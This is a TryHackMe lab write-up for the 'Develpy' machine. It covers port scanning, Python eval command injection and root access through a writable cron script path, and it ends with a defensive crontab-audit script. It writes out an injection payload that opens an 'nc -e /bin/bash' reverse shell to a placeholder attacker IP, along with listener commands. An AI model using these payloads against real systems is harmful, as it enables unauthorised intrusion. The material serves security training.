Develpy — TryHackMe — WriteUp

TonyRahmos
Dec 10, 2020

Hello. I’m Rahmos. Here is my Develpy — TryHackMe — WriteUp. Check it out!

First, deploy the machine and scan for open ports with nmap:

nmap -A -T4 -p- -v <ip>

nmap

So there are 2 open ports: 22 (SSH) and 10000 (HTTP). Let’s first access the website on port 10000:

website

The page shows a Python exception, which means this is not an HTML page but a Python script listening on the port. So let’s connect with nc and give the script some input:

nc <ip> 10000

nc

As you can see, now I can input “number of exploits”. Let’s try “1”:

So the script pings tryhackme.com n times, where n is the input. Let’s try command injection. First, start a listener on your machine:

nc -lvnp 4444

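Then I will input this line to spawn a reverse shell. It is a Python expression rather than a shell command, so it only runs if the script evaluates its input as Python code:

__import__('os').system('nc -e /bin/bash <your-VPN-ip> 4444')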

And the code has been executed! I’ve got the shell:

reverse shell

Spawn a tty shell using Python:

python -c 'import pty;pty.spawn("/bin/bash")'

export TERM=xterm

Run ls to view the files, and I’ve got the first user flag:

user flag

Next, I’ll find a way to own root. The image “credential.png” looks suspicious. Let’s transfer it to my machine.

credential.png

This is an “npiet” image, which stores hidden data. You can use this link to extract the hidden data. After extracting it, I’ve got the password of user king:

king’s password

Now let’s run sudo -l to see if I can use sudo as king:

sudo -l

Well, I can’t. Let’s find another way. There are 2 scripts, root.sh and run.sh, inside king’s home:

I cannot chmod +x root.sh, but I can with run.sh:

Let’s look at the cron jobs:

cat /etc/crontab

So every minute root executes “root.sh” inside king’s home folder. King doesn’t have permission to modify this root.sh, but king can delete it, because it sits in king’s home directory and deleting a file only requires write permission on the directory that contains it:

remove root.sh

Now I’ll create a new “root.sh” that spawns a reverse shell:

modify root.sh

Now start a listener on port 5555:

nc -lvnp 5555

Wait 1 min and I’ve got the shell as root!

root shell

Get the final flag:

root.txt
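
The cron step worked because root's job runs a script from a directory that another user owns, so the permissions on root.sh itself do not protect it. As an added example (not part of the original write-up), this Python audit walks every absolute path used by a root job in /etc/crontab up to / and reports anything a non-root user controls. The crontab lines, the uid 1000 for king, the permission table and all function names are constructed for illustration.

```python
import os
import stat

# Constructed sample: a root job whose script lives in a user's home directory.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root bash /home/king/root.sh
"""
# Constructed (uid, mode) table standing in for os.stat; uid 1000 is assumed for king.
SAMPLE_FS = {
    "/": (0, 0o040755), "/etc": (0, 0o040755), "/etc/cron.hourly": (0, 0o040755),
    "/home": (0, 0o040755), "/home/king": (1000, 0o040755), "/home/king/root.sh": (0, 0o100644),
}

def stat_info(path):
    st = os.stat(path)  # live-system lookup; follows symlinks
    return st.st_uid, st.st_mode

def root_commands(crontab_text):
    """Yield the command of every root job in /etc/crontab format."""
    for line in crontab_text.splitlines():
        fields = line.strip().split(None, 6)  # 5 time fields, user, command
        if len(fields) == 7 and fields[0][0] not in "#@" and fields[5] == "root":
            yield fields[6]

def path_findings(path, info=stat_info):
    """Walk from path up to /, reporting anything a non-root user controls."""
    findings, current = [], os.path.normpath(path)
    while True:
        try:
            uid, mode = info(current)
            sticky_dir = stat.S_ISDIR(mode) and mode & stat.S_ISVTX
            if uid != 0:
                findings.append((current, "owned by uid %d" % uid))
            elif mode & (stat.S_IWGRP | stat.S_IWOTH) and not sticky_dir:
                findings.append((current, "group- or world-writable"))
        except (OSError, KeyError):
            pass  # path does not exist (or is not in the sample table)
        if current == "/":
            return findings
        current = os.path.dirname(current)

def audit_root_jobs(crontab_text, info=stat_info):
    """Return {absolute path in a root job: findings} for risky paths only."""
    tokens = [t for c in root_commands(crontab_text) for t in c.replace(";", " ").split()]
    hits = {t: path_findings(t, info) for t in tokens if t.startswith("/")}
    return {t: f for t, f in hits.items() if f}
```

On a live host, call audit_root_jobs(open("/etc/crontab").read()); the fix for any finding is to move the script into a root-owned directory such as /usr/local/sbin.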

The end.

HAPPY HACKING
